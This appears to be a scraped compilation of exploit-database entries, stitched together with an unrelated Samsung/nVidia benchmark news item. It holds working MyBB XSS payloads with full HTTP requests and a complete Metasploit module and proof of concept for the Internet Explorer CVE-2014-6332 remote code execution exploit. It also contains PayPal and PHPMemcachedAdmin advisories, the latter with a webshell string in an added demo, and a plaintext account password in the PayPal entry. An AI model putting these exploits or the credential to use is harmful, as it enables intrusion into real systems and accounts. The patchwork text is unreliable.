Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly
Content-Length: 1247
Content-Type: text/html

<div class="modal">
<div style="overflow-y: auto; max-height: 400px;" class="modal_0">
<form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
<input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
<input type="hidden" name="action" value="do_report" />
<input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />
<input type="hidden" name="pid" value="0" />

b) Stored XSS - Signature

Vuln: POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]

#1 - Request (change signature):

POST /mybb-1.8.1/usercp.php HTTP/1.1
Host: localhost
Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
Content-Type: application/x-www-form-urlencoded
Content-Length: 203

my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature

#2 - Request (user's profile):

GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1
Host: localhost
Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig

#2 - Response:

HTTP/1.1 200 OK
Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly
Content-Length: 12740
Content-Type: text/html; charset=UTF-8
(...)
<table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">
<tr>
<td class="thead"><strong>user's Signature</strong></td>
</tr>
<tr>
<td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>
</tr>
</table>
<br />

c) Reflected XSS - Templates (AP)

Vuln: GET 'title' - title"><script>alert(666)</script>
localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1

Request:

GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1
Host: localhost

Response:

HTTP/1.1 200 OK
(...)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/1">
<title>Editing Template: calendar"><script>alert(666)</script></title>

d) Reflected XSS - Languages (AP)

Vuln: GET 'file' - <a onmouseover=alert(666)>woot
localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot

Request:

GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1
Host: localhost

Response:

HTTP/1.1 200 OK
(...)
<a href="index.php?module=config-languages">Languages</a> » <a href="index.php?module=config-languages&action=edit&lang=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span>
(...)
<div class="title"><a onmouseover=alert(666)>woot</div>

Source: http://www.exploit-db.com/exploits/35224/
17.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Windows OLE Automation Array Remote Code Execution",
      'Description'    => %q{
        This module exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
        Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0
        until version 11 within Windows95 up to Windows 10.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'IBM',                                    # Discovery
          'yuange <twitter.com/yuange75>',          # PoC
          'Rik van Duijn <twitter.com/rikvduijn>',  # Metasploit
          'Wesley Neelen <security[at]forsec.nl>'   # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2014-6332' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "none"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "November 12 2014",
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
    payl.slice! "powershell.exe "

    html = <<-EOS
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function trigger()
  On Error Resume Next
  set shell=createobject("Shell.Application")
  shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0) then
    exit function
  end if
  if (instr(info,"MSIE")>0) then
    intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
    exit function
  end if
  win9x=0
  BeginInit()
  If Create()=True Then
    myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
    else
      setnotsafemode()
    end if
  end if
end function

function BeginInit()
  Randomize()
  redim aa(5)
  redim ab(5)
  a0=13+17*rnd(6)
  a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
      ' document.write(i)
      Create=True
      Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
  On Error Resume Next
  i=testaa
  i=null
  redim Preserve aa(a2)
  ab(0)=0
  aa(a1)=i
  ab(0)=6.36598737437801E-314
  aa(a1+2)=myarray
  ab(2)=1.74088534731324E-310
  mydata=aa(a1)
  redim Preserve aa(a0)
end function

function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)
  for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
      j=0
      redim Preserve aa(a2)
      aa(a1+2)(i+&h11c+k)=ab(4)
      redim Preserve aa(a0)
      j=0
      j=readmemo(i+&h120+k)
      Exit for
    end if
  next
  ab(2)=1.69759663316747E-313
  trigger()
end function

function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000
  redim Preserve aa(a0)
  redim ab(a0)
  redim Preserve aa(a2)
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  If(IsObject(aa(a1-1)) = False) Then
    if(intVersion<4) then
      mem=cint(a0+1)*16
      j=vartype(aa(a1-1))
      if((j=mem+4) or (j*8=mem+8)) then
        if(vartype(aa(a1-1))<>0) Then
          If(IsObject(aa(a1)) = False ) Then
            type1=VarType(aa(a1))
          end if
        end if
      else
        redim Preserve aa(a0)
        exit function
      end if
    else
      if(vartype(aa(a1-1))<>0) Then
        If(IsObject(aa(a1)) = False ) Then
          type1=VarType(aa(a1))
        end if
      end if
    end if
  end if
  If(type1=&h2f66) Then
    Over=True
  End If
  If(type1=&hB9AD) Then
    Over=True
    win9x=1
  End If
  redim Preserve aa(a0)
end function

function ReadMemo(add)
  On Error Resume Next
  redim Preserve aa(a2)
  ab(0)=0
  aa(a1)=add+4
  ab(0)=1.69759663316747E-313
  ReadMemo=lenb(aa(a1))
  ab(0)=0
  redim Preserve aa(a0)
end function
</script>
</body>
</html>
    EOS

    print_status("Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end
end

Source: Internet Explorer OLE Automation Array Remote Code Execution (msf)
18.
//*
allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
cve-2014-6332 exploit
https://twitter.com/yuange75
http://hi.baidu.com/yuange1975
*//

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
  On Error Resume Next
  set shell=createobject("Shell.Application")
  shell.ShellExecute "notepad.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0) then
    exit function
  end if
  if (instr(info,"MSIE")>0) then
    intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
    exit function
  end if
  win9x=0
  BeginInit()
  If Create()=True Then
    myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    if(intVersion<4) then
      document.write("<br> IE")
      document.write(intVersion)
      runshellcode()
    else
      setnotsafemode()
    end if
  end if
end function

function BeginInit()
  Randomize()
  redim aa(5)
  redim ab(5)
  a0=13+17*rnd(6)
  a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
      ' document.write(i)
      Create=True
      Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
  On Error Resume Next
  i=testaa
  i=null
  redim Preserve aa(a2)
  ab(0)=0
  aa(a1)=i
  ab(0)=6.36598737437801E-314
  aa(a1+2)=myarray
  ab(2)=1.74088534731324E-310
  mydata=aa(a1)
  redim Preserve aa(a0)
end function

function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)
  for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
      j=0
      redim Preserve aa(a2)
      aa(a1+2)(i+&h11c+k)=ab(4)
      redim Preserve aa(a0)
      j=0
      j=readmemo(i+&h120+k)
      Exit for
    end if
  next
  ab(2)=1.69759663316747E-313
  runmumaa()
end function

function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000
  redim Preserve aa(a0)
  redim ab(a0)
  redim Preserve aa(a2)
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  If(IsObject(aa(a1-1)) = False) Then
    if(intVersion<4) then
      mem=cint(a0+1)*16
      j=vartype(aa(a1-1))
      if((j=mem+4) or (j*8=mem+8)) then
        if(vartype(aa(a1-1))<>0) Then
          If(IsObject(aa(a1)) = False ) Then
            type1=VarType(aa(a1))
          end if
        end if
      else
        redim Preserve aa(a0)
        exit function
      end if
    else
      if(vartype(aa(a1-1))<>0) Then
        If(IsObject(aa(a1)) = False ) Then
          type1=VarType(aa(a1))
        end if
      end if
    end if
  end if
  If(type1=&h2f66) Then
    Over=True
  End If
  If(type1=&hB9AD) Then
    Over=True
    win9x=1
  End If
  redim Preserve aa(a0)
end function

function ReadMemo(add)
  On Error Resume Next
  redim Preserve aa(a2)
  ab(0)=0
  aa(a1)=add+4
  ab(0)=1.69759663316747E-313
  ReadMemo=lenb(aa(a1))
  ab(0)=0
  redim Preserve aa(a0)
end function
</script>
</body>
</html>

Source: http://www.exploit-db.com/exploits/35229/
19. As the title says, Samsung is upset with nVidia. The reason is said to be that the Tegra K1 platform gets a better result than the Exynos 5433 platform, and Samsung considers this a lie, beating its chest that they are better and that nVidia cheats. Let's not forget that Samsung has also had problems in the past with falsified tests, and now they accuse others. It seems that the Tegra K1 platform, which is also found in the new Google Nexus 9 tablet made by HTC, scores higher than Samsung's Exynos 5433 platform, found in the Galaxy Note 4, which we tested here. Samsung claims that their chip is better and that nVidia falsified the result. The Tegra K1 scored 1500 points more, which annoyed the South Koreans. In addition, Samsung has also sued nVidia over 6 patents used without a license. nVidia only said that their chip is better, and nothing more. It remains to be seen what will happen in the future. Source: Samsung sued nVidia for falsifying benchmarks | Arena IT
20. PayPal suffered from an arbitrary code execution vulnerability. A filter bypass and persistent bug was also discovered during the testing of the same vulnerable parameter location.

Document Title:
===============
PayPal Inc - Filter Bypass & Arbitrary Code Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=936

Video: http://www.vulnerability-lab.com/get_content.php?id=1275

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2014/11/05/paypal-inc-fixed-filter-bypass-profile-code-execution-during-infrastructure

Release Date:
=============
2014-11-05

Vulnerability Laboratory ID (VL-ID):
====================================
936

Common Vulnerability Scoring System:
====================================
9.1

Product & Service Introduction:
===============================
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card).

The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent script code injection web vulnerability in the official PayPal Inc core application.

Vulnerability Disclosure Timeline:
==================================
2013-04-25: Researcher Notification & Coordination (PayPal Inc - Bug Bounty Program)
2013-04-26: Vendor Notification (PayPal Inc - Bug Bounty Program)
2013-05-01: Vendor Response/Feedback (PayPal Inc - Bug Bounty Program)
2013-09-12: Vendor Response/Feedback (Ebay Inc - Bug Bounty Program)
2014-10-01: Vendor Response/Feedback (Ebay Inc - Bug Bounty Program)
2014-10-12: Vendor Fix/Patch (PayPal Inc - Developer Team)
2014-11-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PayPal Inc
Product: Core Application 2013 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
A system specific arbitrary code execution vulnerability has been discovered in the official PayPal Inc Web-Application & API. A filter bypass and persistent bug has also been revealed during the tests in the same vulnerable parameter location.

The system specific arbitrary code execution vulnerability is located in the developer api portal with connection and account access to the paypal portal api. First the attacker registers a user account and includes in the `cardholder confidential` and `accountSelName` value own malicious persistent script codes or local web-server files. To attack, the help center data of the malicious profile requires a second registration to the developer api portal with the same credentials (connected). The accountSelName and the confidential values are not limited on input.

The attacker is able to load script codes but can also remotely execute arbitrary codes to access local web-server files or configs. The filter bypass occurs during the execution onclick by opening the profile. The trusted context of the dev api user account will be streamed through the help center link on GET method requests. The regular filter of paypal prevents the external inject of frames to other websites but in case of this issue the trusted context is directly executed on top of the profile. The execution and inject can occur remotely by attackers and the attack type is pending from persistent xss to arbitrary code execution and local web-server file request through the profile. The web-server and misconfiguration allows the attacker to, for example, include a frame with a local request through the trusted context to capture unauthorized data of the system. A webshell inject could also be possible during the execution point of the paypal users profile.

The attack vector is on the application-side of the paypal service and the injection request method is POST (dev api & help center). The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 9.1.

Exploitation of the system specific code execution vulnerability requires a low privileged paypal inc account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific codes, webshell injects via POST method, unauthorized path/file value requests to compromise the application or the connected module components.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] helpcenter/home/ ( https://www.paypal.com/webapps/helpcenter/home/ )
[+] developer.paypal.com ( https://developer.paypal.com/webapps/developer/support )

Vulnerable Parameter(s):
[+] accountSelName confidential
[+] confidential

Affected Module(s):
[+] PayPal Inc – Profile User Index (Main) – Execution through > https://developer.paypal.com/webapps/developer/support )

Proof of Concept (PoC):
=======================
The system specific code execution and persistent issue (filter bypass) can be exploited by remote attackers with a low privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual Steps to reproduce the vulnerability ...

1. First register an account to the developer portal api
2. Second connect the paypal account to the help center by registration (2. to 1. also possible)
Note: On registration it`s required to include own payloads (code execution [path|file|config] or script code [html|php|js]) to the AccountSelName & cardholder confidential input.
3. Save the payload to your profile
4. Open the dev webportal & include the same data (payload) to your dev api profile values.
Note: On our tests we did, but we are not sure if this is a requirement for a successful test.
5. Now surf to the following internal dev website https://developer.paypal.com/webapps/developer/support )
Note: On the bottom of the page is now the paypal support link with the malicious injected code
6. Click the "Visit PayPal Support" link
7. The website redirects to the local paypal profile with the new api template theme. The system specific code execution occurs directly in the middle where the streamed data of the helpcenter through the dev api portal will become visible. The vulnerable executable values are `AccountSelName` and cardholder `confidential` account data.
Note: If you injected script code, the script code execution on the main profile request through the dev api service or a local config/file of the web-server will be loaded.
8. Successful reproduce of the remote vulnerability in the paypal infrastructure!

Note: DETAILS $ PAYPAL TO AUTHORIZED USAGE

Reference(s):
From < https://developer.paypal.com/webapps/developer/support
Through API > https://www.paypal.com/webapps/helpcenter/home/
To < https://www.paypal.com/webapps/helpcenter/home/a [ARBITRARY CODE EXECUTION!]

PoC: Help Center Index - confidential & accountSelName confidential

<div class="nav product merchant">
<div class="wrapper">
<div class="column_8_16" style="clear:both">
<div class="one column">
<div class="accountSelName confidential">
<div class="confidential" tabindex="0">%20>>"<<x>%20%20%20%20"><i... #[SYSTEM SPECIFIC CODE EXECUTION OR PERSISTENT SCRIPT CODE!]
</div>
</div>

Note: Code snippet poc shows the execution of the code after the inject of the test payloads

--- PoC-Session Logs [GET] (Vulnerable Service) ---
22:28:56.757[1073ms][total 1933ms] Status: 200[OK]
GET https://developer.paypal.com/webapps/developer/support
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[2841] Mime Type[text/html]
Request Headers:
Host[developer.paypal.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://developer.paypal.com/webapps/developer/dashboard/test]
Connection[keep-alive]
Response Headers:
Date[Fri, 26 Apr 2013 20:29:00 GMT]
Server[Apache-Coyote/1.1]
X-Frame-Options[SAMEORIGIN]
Cache-Control[must-revalidate, proxy-revalidate, no-cache]
Content-Type[text/html;charset=utf-8]
Content-Language[en-US]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Content-Length[2841]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]

Note: The session log above with the GET method request shows the request which leads to the execution in the next session-log. The server accepts the malicious and manipulated request and redirects via referer and non expired session to the paypal.com portals where the execution occurs.

--- PoC Session Logs [GET] (Execution) ---
22:29:06.862[3380ms][total 3380ms] Status: 200[OK]
GET https://www.paypal.com/webapps/helpcenter/home/a
Load Flags[LOAD_DOCUMENT_URI ] Content Size[5225] Mime Type[text/html]
Request Headers:
Host[www.paypal.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://www.paypal.com/webapps/helpcenter/home/]
Connection[keep-alive]
Response Headers:
Server[Apache-Coyote/1.1]
X-Frame-Options[SAMEORIGIN]
Cache-Control[must-revalidate, proxy-revalidate, no-cache]
Content-Type[text/html;charset=UTF-8]
Content-Language[en-US]
Content-Encoding[gzip]
Content-Length[5225]
Date[Fri, 26 Apr 2013 20:29:12 GMT]
Connection[keep-alive]
Vary[Accept-Encoding]

Note: The session logs above show that the server accepted (200 OK) the request and answers with the malicious code execution (GET) as response to me as user. The service runs under the same origin policy which returns in the result of the dev through the help center.
The execution can also be watched in the recorded research video for the paypal bug bounty issue #88.

--- [ACCESS FOR PAYPAL] Sandbox to Live Help Center Service >
Account: ***********@gmail.com
password: merlin23

1.png
The first image explains where the vulnerable location link has been placed after the inject for the further execution of the code during the exploitation-phase. The system specific code execution or persistent issue can be exploited by clicking the "Visit PayPal Support" link.

2.png
The second image shows where the code execution occurs inside of the paypal inc webapps core and api. The code execution can be triggered by two vulnerable values via POST inject. To test we injected two payloads: own frame and one local request of a web-server config file. The execution of the code occurs obviously next to the main user profile on index after the redirect to the referer.

3.png
The third picture shows where the code execution and persistent issue with filter bypass is located. The vulnerable values are `confidential` and `accountSelName confidential`. Both values will be taken through the filter via referer on a redirect request with the same origin policy setup. The execution does not only allow to inject script codes for xss, the issue also allows an attacker to request local web-server files by the trusted same origin policy context request.

4.png
The 4th image shows the session tamper details next to processing to clicking the link of the developer portal (api) to paypal.com (paypal). The tampered session through Mozilla shows that the server accepted the GET request with the further visible trusted context. The server responds with 200 OK and directly executes the code through the paypal.com domain in the profile user top section.

5.png
The 5th image shows where the code execution appears to become visible in the live session tamper. The domain https://www.paypal.com/webapps/helpcenter/home/a shows that the malicious inject was successful because after the path ./helpcenter/home/[x] the code execution occurs after the filter bypass through the other services.

6.png
The 6th image only shows that the attack vector of the issue is located on the application-side of the paypal inc online service. Proof for check was multiple GET requests during the test from the paypal database as user.

Solution - Fix & Patch:
=======================
A solution to fix the issue could be to parse all incoming values through the same origin policy configuration of the connected portal with the same api. The vulnerable accountselname confidential and confidential values need to be encoded even if transferred through another service location. Restrict the input for registration and disallow special chars to prevent script code injects and code execution payloads with unauthorized file requests through the trusted paypal home webapps context.

Note: The issue should be checked by the dev team to review also the backend effect of the issues. Issue is already marked as patched 2014Q4.

Security Risk:
==============
The security risk of the arbitrary code execution in the confidential account value GET method request is estimated as critical. (CVSS 9.1)
Attackers can request local path values by implementation of a privileged context request in the referer, which results in a system compromise because attackers are able to access unauthorized server local files.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com COMPANY: Evolution Security GmbH BUSINESS: www.evolution-sec.com Surs?: PayPal Arbitrary Code Execution ? Packet Storm http://magazine.vulnerability-db.com/?q=articles/2014/11/05/paypal-inc-fixed-filter-bypass-profile-code-execution-during-infrastructure
21. CVE-2014-8731
CVSSv2 Vector: [AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:U/RC:C]
CVSSv2 Base Score=10.0
CVSSv2 Temp Score=9.5
OWASP Top 10 classification: A1 - Injection

PHPMemcachedAdmin is a web-based frontend for Linux's memcached daemon.
Project Homepage: https://code.google.com/p/phpmemcacheadmin/
Download Site: http://blog.elijaa.org/index.php?pages/phpMemcachedAdmin-Download

PHPMemcachedAdmin stores data in the server's filesystem. Part of the serialized data and the last part of the concatenated filename may be specified by the user, which can lead to remote code execution, e.g. if a PHP script is created and placed within the webserver's document root. All versions prior to and including the current version 1.2.2 are affected as far as we know.

Source: PHPMemcachedAdmin 1.2.2 Remote Code Execution (Packet Storm)
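The bug class above (a user-picked filename tail plus user-controlled serialized content, written into a web-served directory) in miniature, as an added example that is not PHPMemcachedAdmin's code. The storage directory, the `cluster_` prefix, the `.dat` extension, the serialize-like format and the `served_as_php` handler model are all assumptions made for the demonstration; the hardened form pins the extension, allowlists the name and refuses anything that resolves outside the storage directory.

```python
"""Added example (not PHPMemcachedAdmin's code): user-controlled filename
suffix + user-controlled content in a web-served directory == code execution."""
import os
import re
import tempfile

PHP_MARKER = "<?php"
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")   # assumed allowlist for config names


def served_as_php(path):
    """Models the usual Apache/nginx handler mapping: *.php is executed, not served."""
    return path.lower().endswith(".php")


def php_serialize_like(host):
    """Mimics a serialized array with one user string inside (format is an assumption)."""
    return 'a:1:{s:4:"host";s:%d:"%s";}' % (len(host), host)


def vulnerable_save(storage_dir, name_suffix, host):
    """The advisory's pattern: the end of the file name and part of the stored
    data both come straight from the request.  With suffix ".php" and a
    "<?php ...?>" host value, the interpreter runs the embedded tag no matter
    what surrounds it."""
    path = os.path.join(storage_dir, "cluster_" + name_suffix)
    with open(path, "w") as fh:
        fh.write(php_serialize_like(host))
    return os.path.realpath(path)


def hardened_save(storage_dir, name, host):
    """Fixed extension, allowlisted name, and a realpath check that the file
    stays inside storage_dir.  Storage should also live outside the docroot;
    that part is a deployment decision this function cannot enforce."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("config name must match %s" % SAFE_NAME.pattern)
    root = os.path.realpath(storage_dir)
    path = os.path.realpath(os.path.join(root, "cluster_" + name + ".dat"))
    if os.path.dirname(path) != root:
        raise ValueError("path escapes storage directory")
    with open(path, "w") as fh:
        fh.write(php_serialize_like(host))
    return path


def demo():
    """Runs both variants in a scratch directory and reports what matters."""
    storage = tempfile.mkdtemp(prefix="pma_")
    webshell = '<?php system($_GET["c"]); ?>'        # constructed attacker input
    bad = vulnerable_save(storage, ".php", webshell)   # -> .../cluster_.php
    good = hardened_save(storage, "prod-cluster", webshell)
    rejected = []
    for name in (".php", "../evil", "x.php", ""):
        try:
            hardened_save(storage, name, "ok")
        except ValueError:
            rejected.append(name)
    with open(bad) as fh:
        bad_body = fh.read()
    return {
        "vuln_executes": served_as_php(bad) and PHP_MARKER in bad_body,
        "fixed_executes": served_as_php(good),
        "rejected": rejected,
    }


if __name__ == "__main__":
    print(demo())
```

The content check is deliberately absent from the hardened version: blacklisting `<?php` in the data is the kind of filter that gets bypassed; what closes the hole is that the attacker can no longer choose an extension the web server maps to an interpreter, and, in deployment, that the directory is not served at all.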
22. CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability

Vendor: Corel Corporation
Product web page: http://www.corel.com
Affected version: 17.1.0.572 (X7) - 32bit/64bit (EN)
                  15.0.0.486 (X5) - 32bit (EN)

Summary: CorelDRAW is one of the image-creating programs in a suite of graphic arts software used by professional artists, educators, students, businesses and the general public. The CorelDRAW Graphics Suite X7, which includes CorelDRAW, is sold as stand-alone software and as a cloud-based subscription. CorelDRAW is the core of the graphics suite and is primarily used for vector illustrations and page layouts.

Desc: CorelDRAW is prone to an off-by-one memory corruption vulnerability. An attacker can exploit this issue by tricking a victim into opening a malicious CDR file to execute arbitrary code and/or to cause denial-of-service conditions.

---
